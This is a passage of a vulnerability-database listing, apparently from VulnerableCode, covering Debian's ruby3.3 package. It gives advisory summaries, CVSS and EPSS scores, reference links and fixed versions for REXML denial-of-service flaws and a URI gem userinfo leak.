resource_url	http://public2.vulnerablecode.io/packages/pkg:deb/debian/ruby3.3@3.3.8-2%3Fdistro=trixie

aliases CVE-2024-43398, GHSA-vmwr-mc7x-5vc3

risk_score 4.0

exploitability 0.5

weighted_severity 8.0

resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-jdtw-bn8z-e3b6

url VCID-m6hy-vnf9-hyfe

vulnerability_id VCID-m6hy-vnf9-hyfe

summary

REXML DoS vulnerability
### Impact

The REXML gem before 3.3.2 has a DoS vulnerability when it parses an XML that has many entity expansions with SAX2 or pull parser API.

If you need to parse untrusted XMLs with SAX2 or pull parser API, you may be impacted to this vulnerability.

### Patches

The REXML gem 3.3.3 or later include the patch to fix the vulnerability.

### Workarounds

Don't parse untrusted XMLs with SAX2 or pull parser API.

### References

* https://www.ruby-lang.org/en/news/2008/08/23/dos-vulnerability-in-rexml/ : This is a similar vulnerability
* https://www.ruby-lang.org/en/news/2024/08/01/dos-rexml-cve-2024-41946/: An announce on www.ruby-lang.org

references

reference_url

https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2024-41946.json

reference_id

reference_type

scores

value	3.3
scoring_system	cvssv3
scoring_elements	CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L

url

https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2024-41946.json

reference_url

https://api.first.org/data/v1/epss?cve=CVE-2024-41946

reference_id

reference_type

scores

value	0.00661
scoring_system	epss
scoring_elements	0.71267
published_at	2026-05-12T12:55:00Z

value	0.00661
scoring_system	epss
scoring_elements	0.71239
published_at	2026-05-11T12:55:00Z

value	0.00661
scoring_system	epss
scoring_elements	0.71114
published_at	2026-04-08T12:55:00Z

value	0.00661
scoring_system	epss
scoring_elements	0.71165
published_at	2026-04-16T12:55:00Z

value	0.00661
scoring_system	epss
scoring_elements	0.71119
published_at	2026-04-13T12:55:00Z

value	0.00661
scoring_system	epss
scoring_elements	0.71135
published_at	2026-04-12T12:55:00Z

value	0.00661
scoring_system	epss
scoring_elements	0.7115
published_at	2026-04-11T12:55:00Z

value	0.00661
scoring_system	epss
scoring_elements	0.71127
published_at	2026-04-09T12:55:00Z

value	0.00661
scoring_system	epss
scoring_elements	0.71276
published_at	2026-05-09T12:55:00Z

value	0.00661
scoring_system	epss
scoring_elements	0.71241
published_at	2026-05-07T12:55:00Z

value	0.00661
scoring_system	epss
scoring_elements	0.71204
published_at	2026-05-05T12:55:00Z

value	0.00661
scoring_system	epss
scoring_elements	0.7108
published_at	2026-04-02T12:55:00Z

value	0.00661
scoring_system	epss
scoring_elements	0.71097
published_at	2026-04-04T12:55:00Z

value	0.00661
scoring_system	epss
scoring_elements	0.71072
published_at	2026-04-07T12:55:00Z

value	0.00661
scoring_system	epss
scoring_elements	0.71172
published_at	2026-04-18T12:55:00Z

value	0.00679
scoring_system	epss
scoring_elements	0.7164
published_at	2026-04-26T12:55:00Z

value	0.00679
scoring_system	epss
scoring_elements	0.71635
published_at	2026-04-24T12:55:00Z

value	0.00679
scoring_system	epss
scoring_elements	0.71584
published_at	2026-04-21T12:55:00Z

value	0.00679
scoring_system	epss
scoring_elements	0.71644
published_at	2026-04-29T12:55:00Z

url

https://api.first.org/data/v1/epss?cve=CVE-2024-41946

reference_url	https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-41946
reference_id
reference_type
scores
url	https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-41946

reference_url

https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml

reference_id

reference_type

scores

value	5.3
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L

url

https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml

reference_url

reference_id

reference_type

scores

value	7.5
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

value	6.9
scoring_system	cvssv4
scoring_elements	CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N

value	MODERATE
scoring_system	generic_textual
scoring_elements

url

https://github.com/ruby/rexml/commit/033d1909a8f259d5a7c53681bcaf14f13bcf0368

reference_url

reference_id

reference_type

scores

value	5.3
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L

value	7.5
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

value	6.9
scoring_system	cvssv4
scoring_elements	CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N

value	MODERATE
scoring_system	generic_textual
scoring_elements

value	Track
scoring_system	ssvc
scoring_elements	SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2024-08-01T15:45:10Z/

url

https://github.com/ruby/rexml/commit/033d1909a8f259d5a7c53681bcaf14f13bcf0368

reference_url

https://github.com/ruby/rexml/security/advisories/GHSA-5866-49gr-22v4

reference_id

reference_type

scores

value	5.3
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L

value	7.5
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

value	MODERATE
scoring_system	cvssv3.1_qr
scoring_elements

value	6.9
scoring_system	cvssv4
scoring_elements	CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N

value	MODERATE
scoring_system	generic_textual
scoring_elements

value	Track
scoring_system	ssvc
scoring_elements	SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2024-08-01T15:45:10Z/

url

https://github.com/ruby/rexml/security/advisories/GHSA-5866-49gr-22v4

reference_url

https://github.com/rubysec/ruby-advisory-db/blob/master/gems/rexml/CVE-2024-41946.yml

reference_id

reference_type

scores

value	7.5
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

value	6.9
scoring_system	cvssv4
scoring_elements	CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N

value	MODERATE
scoring_system	generic_textual
scoring_elements

url

https://github.com/rubysec/ruby-advisory-db/blob/master/gems/rexml/CVE-2024-41946.yml

reference_url

https://lists.debian.org/debian-lts-announce/2025/01/msg00011.html

reference_id

reference_type

scores

value	7.5
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

value	6.9
scoring_system	cvssv4
scoring_elements	CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N

value	MODERATE
scoring_system	generic_textual
scoring_elements

url

https://lists.debian.org/debian-lts-announce/2025/01/msg00011.html

reference_url

https://nvd.nist.gov/vuln/detail/CVE-2024-41946

reference_id

reference_type

scores

value	7.5
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

value	6.9
scoring_system	cvssv4
scoring_elements	CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N

value	MODERATE
scoring_system	generic_textual
scoring_elements

url

https://nvd.nist.gov/vuln/detail/CVE-2024-41946

reference_url

https://security.netapp.com/advisory/ntap-20250117-0007

reference_id

reference_type

scores

value	7.5
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

value	6.9
scoring_system	cvssv4
scoring_elements	CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N

value	MODERATE
scoring_system	generic_textual
scoring_elements

url

https://security.netapp.com/advisory/ntap-20250117-0007

reference_url

https://www.ruby-lang.org/en/news/2008/08/23/dos-vulnerability-in-rexml

reference_id

reference_type

scores

value	5.3
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L

value	7.5
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

value	6.9
scoring_system	cvssv4
scoring_elements	CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N

value	MODERATE
scoring_system	generic_textual
scoring_elements

value	Track
scoring_system	ssvc
scoring_elements	SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2024-08-01T15:45:10Z/

url

https://www.ruby-lang.org/en/news/2008/08/23/dos-vulnerability-in-rexml

reference_url

https://www.ruby-lang.org/en/news/2024/08/01/dos-rexml-cve-2024-41946

reference_id

reference_type

scores

value	5.3
scoring_system	cvssv3
scoring_elements

value	5.3
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L

value	7.5
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

value	6.9
scoring_system	cvssv4
scoring_elements	CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N

value	MODERATE
scoring_system	generic_textual
scoring_elements

value	Track
scoring_system	ssvc
scoring_elements	SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2024-08-01T15:45:10Z/

url

https://www.ruby-lang.org/en/news/2024/08/01/dos-rexml-cve-2024-41946

reference_url	https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1083190
reference_id	1083190
reference_type
scores
url	https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1083190

reference_url	https://bugzilla.redhat.com/show_bug.cgi?id=2302272
reference_id	2302272
reference_type
scores
url	https://bugzilla.redhat.com/show_bug.cgi?id=2302272

reference_url

https://github.com/advisories/GHSA-5866-49gr-22v4

reference_id

GHSA-5866-49gr-22v4

reference_type

scores

value	MODERATE
scoring_system	cvssv3.1_qr
scoring_elements

url

https://github.com/advisories/GHSA-5866-49gr-22v4

reference_url	https://security.gentoo.org/glsa/202507-08
reference_id	GLSA-202507-08
reference_type
scores
url	https://security.gentoo.org/glsa/202507-08

reference_url	https://access.redhat.com/errata/RHSA-2024:6670
reference_id	RHSA-2024:6670
reference_type
scores
url	https://access.redhat.com/errata/RHSA-2024:6670

reference_url	https://access.redhat.com/errata/RHSA-2024:6702
reference_id	RHSA-2024:6702
reference_type
scores
url	https://access.redhat.com/errata/RHSA-2024:6702

reference_url	https://access.redhat.com/errata/RHSA-2024:6703
reference_id	RHSA-2024:6703
reference_type
scores
url	https://access.redhat.com/errata/RHSA-2024:6703

reference_url	https://access.redhat.com/errata/RHSA-2024:6784
reference_id	RHSA-2024:6784
reference_type
scores
url	https://access.redhat.com/errata/RHSA-2024:6784

reference_url	https://access.redhat.com/errata/RHSA-2024:6785
reference_id	RHSA-2024:6785
reference_type
scores
url	https://access.redhat.com/errata/RHSA-2024:6785

reference_url	https://access.redhat.com/errata/RHSA-2025:4063
reference_id	RHSA-2025:4063
reference_type
scores
url	https://access.redhat.com/errata/RHSA-2025:4063

reference_url	https://access.redhat.com/errata/RHSA-2025:4488
reference_id	RHSA-2025:4488
reference_type
scores
url	https://access.redhat.com/errata/RHSA-2025:4488

reference_url	https://usn.ubuntu.com/7091-1/
reference_id	USN-7091-1
reference_type
scores
url	https://usn.ubuntu.com/7091-1/

reference_url	https://usn.ubuntu.com/7091-2/
reference_id	USN-7091-2
reference_type
scores
url	https://usn.ubuntu.com/7091-2/

reference_url	https://usn.ubuntu.com/7840-1/
reference_id	USN-7840-1
reference_type
scores
url	https://usn.ubuntu.com/7840-1/

fixed_packages

url	pkg:deb/debian/ruby3.3@3.3.5-1?distro=trixie
purl	pkg:deb/debian/ruby3.3@3.3.5-1?distro=trixie
is_vulnerable	`false`
affected_by_vulnerabilities
resource_url	http://public2.vulnerablecode.io/packages/pkg:deb/debian/ruby3.3@3.3.5-1%3Fdistro=trixie

url	pkg:deb/debian/ruby3.3@3.3.8-2?distro=trixie
purl	pkg:deb/debian/ruby3.3@3.3.8-2?distro=trixie
is_vulnerable	`false`
affected_by_vulnerabilities
resource_url	http://public2.vulnerablecode.io/packages/pkg:deb/debian/ruby3.3@3.3.8-2%3Fdistro=trixie

aliases CVE-2024-41946, GHSA-5866-49gr-22v4

risk_score 3.4

exploitability 0.5

weighted_severity 6.8

resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-m6hy-vnf9-hyfe

url VCID-msc8-xjz2-2kb4

vulnerability_id VCID-msc8-xjz2-2kb4

summary

REXML ReDoS vulnerability
### Impact

The REXML gem before 3.3.9 has a ReDoS vulnerability when it parses an XML that has many digits between `&#` and `x...;` in a hex numeric character reference (`&#x...;`).

This does not happen with Ruby 3.2 or later. Ruby 3.1 is the only affected maintained Ruby. Note that Ruby 3.1 will reach EOL on 2025-03.

### Patches

The REXML gem 3.3.9 or later include the patch to fix the vulnerability.

### Workarounds

Use Ruby 3.2 or later instead of Ruby 3.1.

### References

* https://www.ruby-lang.org/en/news/2024/10/28/redos-rexml-cve-2024-49761/: An announce on www.ruby-lang.org

references

reference_url

https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2024-49761.json

reference_id

reference_type

scores

value	7.5
scoring_system	cvssv3
scoring_elements	CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

url

https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2024-49761.json

reference_url

https://api.first.org/data/v1/epss?cve=CVE-2024-49761

reference_id

reference_type

scores

value	0.00899
scoring_system	epss
scoring_elements	0.75661
published_at	2026-04-12T12:55:00Z

value	0.00899
scoring_system	epss
scoring_elements	0.75599
published_at	2026-04-02T12:55:00Z

value	0.00899
scoring_system	epss
scoring_elements	0.7563
published_at	2026-04-04T12:55:00Z

value	0.00899
scoring_system	epss
scoring_elements	0.7561
published_at	2026-04-07T12:55:00Z

value	0.00899
scoring_system	epss
scoring_elements	0.75644
published_at	2026-04-08T12:55:00Z

value	0.00899
scoring_system	epss
scoring_elements	0.75655
published_at	2026-04-13T12:55:00Z

value	0.00899
scoring_system	epss
scoring_elements	0.75696
published_at	2026-04-18T12:55:00Z

value	0.00899
scoring_system	epss
scoring_elements	0.75693
published_at	2026-04-16T12:55:00Z

value	0.00899
scoring_system	epss
scoring_elements	0.7568
published_at	2026-04-11T12:55:00Z

value	0.01645
scoring_system	epss
scoring_elements	0.82106
published_at	2026-05-11T12:55:00Z

value	0.01645
scoring_system	epss
scoring_elements	0.82109
published_at	2026-05-09T12:55:00Z

value	0.01645
scoring_system	epss
scoring_elements	0.82123
published_at	2026-05-12T12:55:00Z

value	0.01645
scoring_system	epss
scoring_elements	0.82084
published_at	2026-05-07T12:55:00Z

value	0.01645
scoring_system	epss
scoring_elements	0.82063
published_at	2026-05-05T12:55:00Z

value	0.0169
scoring_system	epss
scoring_elements	0.82297
published_at	2026-04-26T12:55:00Z

value	0.0169
scoring_system	epss
scoring_elements	0.82264
published_at	2026-04-21T12:55:00Z

value	0.0169
scoring_system	epss
scoring_elements	0.82302
published_at	2026-04-29T12:55:00Z

value	0.0169
scoring_system	epss
scoring_elements	0.82285
published_at	2026-04-24T12:55:00Z

url

https://api.first.org/data/v1/epss?cve=CVE-2024-49761

reference_url	https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-49761
reference_id
reference_type
scores
url	https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-49761

reference_url

https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml

reference_id

reference_type

scores

value	5.9
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H

url

https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml

reference_url

reference_id

reference_type

scores

value	7.5
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

value	6.6
scoring_system	cvssv4
scoring_elements	CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:U

value	MODERATE
scoring_system	generic_textual
scoring_elements

url

https://github.com/ruby/rexml/commit/ce59f2eb1aeb371fe1643414f06618dbe031979f

reference_url

reference_id

reference_type

scores

value	7.5
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

value	6.6
scoring_system	cvssv4
scoring_elements	CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:U

value	MODERATE
scoring_system	generic_textual
scoring_elements

value	Track
scoring_system	ssvc
scoring_elements	SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2024-10-28T14:57:03Z/

url

https://github.com/ruby/rexml/commit/ce59f2eb1aeb371fe1643414f06618dbe031979f

reference_url

https://github.com/ruby/rexml/security/advisories/GHSA-2rxp-v6pw-ch6m

reference_id

reference_type

scores

value	7.5
scoring_system	cvssv3
scoring_elements

value	7.5
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

value	MODERATE
scoring_system	cvssv3.1_qr
scoring_elements

value	6.6
scoring_system	cvssv4
scoring_elements	CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:U

value	MODERATE
scoring_system	generic_textual
scoring_elements

value	Track
scoring_system	ssvc
scoring_elements	SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2024-10-28T14:57:03Z/

url

https://github.com/ruby/rexml/security/advisories/GHSA-2rxp-v6pw-ch6m

reference_url

https://github.com/rubysec/ruby-advisory-db/blob/master/gems/rexml/CVE-2024-49761.yml

reference_id

reference_type

scores

value	7.5
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

value	6.6
scoring_system	cvssv4
scoring_elements	CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:U

value	MODERATE
scoring_system	generic_textual
scoring_elements

url

https://github.com/rubysec/ruby-advisory-db/blob/master/gems/rexml/CVE-2024-49761.yml

reference_url

https://lists.debian.org/debian-lts-announce/2025/01/msg00011.html

reference_id

reference_type

scores

value	7.5
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

value	6.6
scoring_system	cvssv4
scoring_elements	CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:U

value	MODERATE
scoring_system	generic_textual
scoring_elements

url

https://lists.debian.org/debian-lts-announce/2025/01/msg00011.html

reference_url

https://nvd.nist.gov/vuln/detail/CVE-2024-49761

reference_id

reference_type

scores

value	7.5
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

value	6.6
scoring_system	cvssv4
scoring_elements	CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:U

value	MODERATE
scoring_system	generic_textual
scoring_elements

url

https://nvd.nist.gov/vuln/detail/CVE-2024-49761

reference_url

https://security.netapp.com/advisory/ntap-20241227-0004

reference_id

reference_type

scores

value	7.5
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

value	6.6
scoring_system	cvssv4
scoring_elements	CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:U

value	MODERATE
scoring_system	generic_textual
scoring_elements

url

https://security.netapp.com/advisory/ntap-20241227-0004

reference_url

https://www.ruby-lang.org/en/news/2024/10/28/redos-rexml-cve-2024-49761

reference_id

reference_type

scores

value	7.5
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

value	6.6
scoring_system	cvssv4
scoring_elements	CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:U

value	MODERATE
scoring_system	generic_textual
scoring_elements

value	Track
scoring_system	ssvc
scoring_elements	SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2024-10-28T14:57:03Z/

url

https://www.ruby-lang.org/en/news/2024/10/28/redos-rexml-cve-2024-49761

reference_url	https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1103790
reference_id	1103790
reference_type
scores
url	https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1103790

reference_url	https://bugzilla.redhat.com/show_bug.cgi?id=2322153
reference_id	2322153
reference_type
scores
url	https://bugzilla.redhat.com/show_bug.cgi?id=2322153

reference_url

https://github.com/advisories/GHSA-2rxp-v6pw-ch6m

reference_id

GHSA-2rxp-v6pw-ch6m

reference_type

scores

value	MODERATE
scoring_system	cvssv3.1_qr
scoring_elements

url

https://github.com/advisories/GHSA-2rxp-v6pw-ch6m

reference_url	https://security.gentoo.org/glsa/202507-08
reference_id	GLSA-202507-08
reference_type
scores
url	https://security.gentoo.org/glsa/202507-08

reference_url	https://access.redhat.com/errata/RHSA-2024:10777
reference_id	RHSA-2024:10777
reference_type
scores
url	https://access.redhat.com/errata/RHSA-2024:10777

reference_url	https://access.redhat.com/errata/RHSA-2024:10834
reference_id	RHSA-2024:10834
reference_type
scores
url	https://access.redhat.com/errata/RHSA-2024:10834

reference_url	https://access.redhat.com/errata/RHSA-2024:10850
reference_id	RHSA-2024:10850
reference_type
scores
url	https://access.redhat.com/errata/RHSA-2024:10850

reference_url	https://access.redhat.com/errata/RHSA-2024:10858
reference_id	RHSA-2024:10858
reference_type
scores
url	https://access.redhat.com/errata/RHSA-2024:10858

reference_url	https://access.redhat.com/errata/RHSA-2024:10860
reference_id	RHSA-2024:10860
reference_type
scores
url	https://access.redhat.com/errata/RHSA-2024:10860

reference_url	https://access.redhat.com/errata/RHSA-2024:10961
reference_id	RHSA-2024:10961
reference_type
scores
url	https://access.redhat.com/errata/RHSA-2024:10961

reference_url	https://access.redhat.com/errata/RHSA-2024:10964
reference_id	RHSA-2024:10964
reference_type
scores
url	https://access.redhat.com/errata/RHSA-2024:10964

reference_url	https://access.redhat.com/errata/RHSA-2024:10966
reference_id	RHSA-2024:10966
reference_type
scores
url	https://access.redhat.com/errata/RHSA-2024:10966

reference_url	https://access.redhat.com/errata/RHSA-2024:10977
reference_id	RHSA-2024:10977
reference_type
scores
url	https://access.redhat.com/errata/RHSA-2024:10977

reference_url	https://access.redhat.com/errata/RHSA-2024:10982
reference_id	RHSA-2024:10982
reference_type
scores
url	https://access.redhat.com/errata/RHSA-2024:10982

reference_url	https://access.redhat.com/errata/RHSA-2024:10984
reference_id	RHSA-2024:10984
reference_type
scores
url	https://access.redhat.com/errata/RHSA-2024:10984

reference_url	https://access.redhat.com/errata/RHSA-2024:11001
reference_id	RHSA-2024:11001
reference_type
scores
url	https://access.redhat.com/errata/RHSA-2024:11001

reference_url	https://access.redhat.com/errata/RHSA-2024:11027
reference_id	RHSA-2024:11027
reference_type
scores
url	https://access.redhat.com/errata/RHSA-2024:11027

reference_url	https://access.redhat.com/errata/RHSA-2024:11028
reference_id	RHSA-2024:11028
reference_type
scores
url	https://access.redhat.com/errata/RHSA-2024:11028

reference_url	https://access.redhat.com/errata/RHSA-2024:11029
reference_id	RHSA-2024:11029
reference_type
scores
url	https://access.redhat.com/errata/RHSA-2024:11029

reference_url	https://access.redhat.com/errata/RHSA-2025:11047
reference_id	RHSA-2025:11047
reference_type
scores
url	https://access.redhat.com/errata/RHSA-2025:11047

reference_url	https://access.redhat.com/errata/RHSA-2025:12499
reference_id	RHSA-2025:12499
reference_type
scores
url	https://access.redhat.com/errata/RHSA-2025:12499

reference_url	https://access.redhat.com/errata/RHSA-2025:13269
reference_id	RHSA-2025:13269
reference_type
scores
url	https://access.redhat.com/errata/RHSA-2025:13269

reference_url	https://access.redhat.com/errata/RHSA-2025:13307
reference_id	RHSA-2025:13307
reference_type
scores
url	https://access.redhat.com/errata/RHSA-2025:13307

reference_url	https://access.redhat.com/errata/RHSA-2025:15124
reference_id	RHSA-2025:15124
reference_type
scores
url	https://access.redhat.com/errata/RHSA-2025:15124

reference_url	https://access.redhat.com/errata/RHSA-2025:15371
reference_id	RHSA-2025:15371
reference_type
scores
url	https://access.redhat.com/errata/RHSA-2025:15371

reference_url	https://access.redhat.com/errata/RHSA-2025:17614
reference_id	RHSA-2025:17614
reference_type
scores
url	https://access.redhat.com/errata/RHSA-2025:17614

reference_url	https://usn.ubuntu.com/7091-1/
reference_id	USN-7091-1
reference_type
scores
url	https://usn.ubuntu.com/7091-1/

reference_url	https://usn.ubuntu.com/7091-2/
reference_id	USN-7091-2
reference_type
scores
url	https://usn.ubuntu.com/7091-2/

reference_url	https://usn.ubuntu.com/7442-1/
reference_id	USN-7442-1
reference_type
scores
url	https://usn.ubuntu.com/7442-1/

fixed_packages

url	pkg:deb/debian/ruby3.3@3.3.6-1?distro=trixie
purl	pkg:deb/debian/ruby3.3@3.3.6-1?distro=trixie
is_vulnerable	`false`
affected_by_vulnerabilities
resource_url	http://public2.vulnerablecode.io/packages/pkg:deb/debian/ruby3.3@3.3.6-1%3Fdistro=trixie

url	pkg:deb/debian/ruby3.3@3.3.8-2?distro=trixie
purl	pkg:deb/debian/ruby3.3@3.3.8-2?distro=trixie
is_vulnerable	`false`
affected_by_vulnerabilities
resource_url	http://public2.vulnerablecode.io/packages/pkg:deb/debian/ruby3.3@3.3.8-2%3Fdistro=trixie

aliases CVE-2024-49761, GHSA-2rxp-v6pw-ch6m

risk_score 3.4

exploitability 0.5

weighted_severity 6.8

resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-msc8-xjz2-2kb4

url VCID-n1ja-n53g-fycm

vulnerability_id VCID-n1ja-n53g-fycm

summary

URI allows for userinfo Leakage in URI#join, URI#merge, and URI#+
There is a possibility for userinfo leakage by in the uri gem.
This vulnerability has been assigned the CVE identifier CVE-2025-27221. We recommend upgrading the uri gem.

## Details

The methods `URI#join`, `URI#merge`, and `URI#+` retained userinfo, such as `user:password`, even after the host is replaced. When generating a URL to a malicious host from a URL containing secret userinfo using these methods, and having someone access that URL, an unintended userinfo leak could occur.

Please update URI gem to version 0.11.3, 0.12.4, 0.13.2, 1.0.3 or later.

## Affected versions

uri gem versions < 0.11.3, 0.12.0 to 0.12.3, 0.13.0, 0.13.1 and 1.0.0 to 1.0.2.

## Credits

Thanks to Tsubasa Irisawa (lambdasawa) for discovering this issue.
Also thanks to nobu for additional fixes of this vulnerability.

references

reference_url

https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2025-27221.json

reference_id

reference_type

scores

value	3.2
scoring_system	cvssv3
scoring_elements	CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:C/C:L/I:N/A:N

url

https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2025-27221.json

reference_url

https://api.first.org/data/v1/epss?cve=CVE-2025-27221

reference_id

reference_type

scores

value	0.00038
scoring_system	epss
scoring_elements	0.11384
published_at	2026-04-02T12:55:00Z

value	0.00038
scoring_system	epss
scoring_elements	0.1144
published_at	2026-04-04T12:55:00Z

value	0.00118
scoring_system	epss
scoring_elements	0.30715
published_at	2026-04-07T12:55:00Z

value	0.00137
scoring_system	epss
scoring_elements	0.33558
published_at	2026-04-13T12:55:00Z

value	0.00137
scoring_system	epss
scoring_elements	0.33568
published_at	2026-04-18T12:55:00Z

value	0.00137
scoring_system	epss
scoring_elements	0.33592
published_at	2026-04-16T12:55:00Z

value	0.00137
scoring_system	epss
scoring_elements	0.33581
published_at	2026-04-12T12:55:00Z

value	0.00152
scoring_system	epss
scoring_elements	0.35907
published_at	2026-04-11T12:55:00Z

value	0.00166
scoring_system	epss
scoring_elements	0.37695
published_at	2026-04-08T12:55:00Z

value	0.00166
scoring_system	epss
scoring_elements	0.37709
published_at	2026-04-09T12:55:00Z

value	0.00169
scoring_system	epss
scoring_elements	0.37626
published_at	2026-05-07T12:55:00Z

value	0.00169
scoring_system	epss
scoring_elements	0.3753
published_at	2026-05-12T12:55:00Z

value	0.00169
scoring_system	epss
scoring_elements	0.37643
published_at	2026-05-09T12:55:00Z

value	0.00169
scoring_system	epss
scoring_elements	0.37556
published_at	2026-05-11T12:55:00Z

value	0.00173
scoring_system	epss
scoring_elements	0.3847
published_at	2026-04-26T12:55:00Z

value	0.00173
scoring_system	epss
scoring_elements	0.38495
published_at	2026-04-24T12:55:00Z

value	0.00173
scoring_system	epss
scoring_elements	0.38651
published_at	2026-04-21T12:55:00Z

value	0.00173
scoring_system	epss
scoring_elements	0.3838
published_at	2026-04-29T12:55:00Z

url

https://api.first.org/data/v1/epss?cve=CVE-2025-27221

reference_url	https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-27221
reference_id
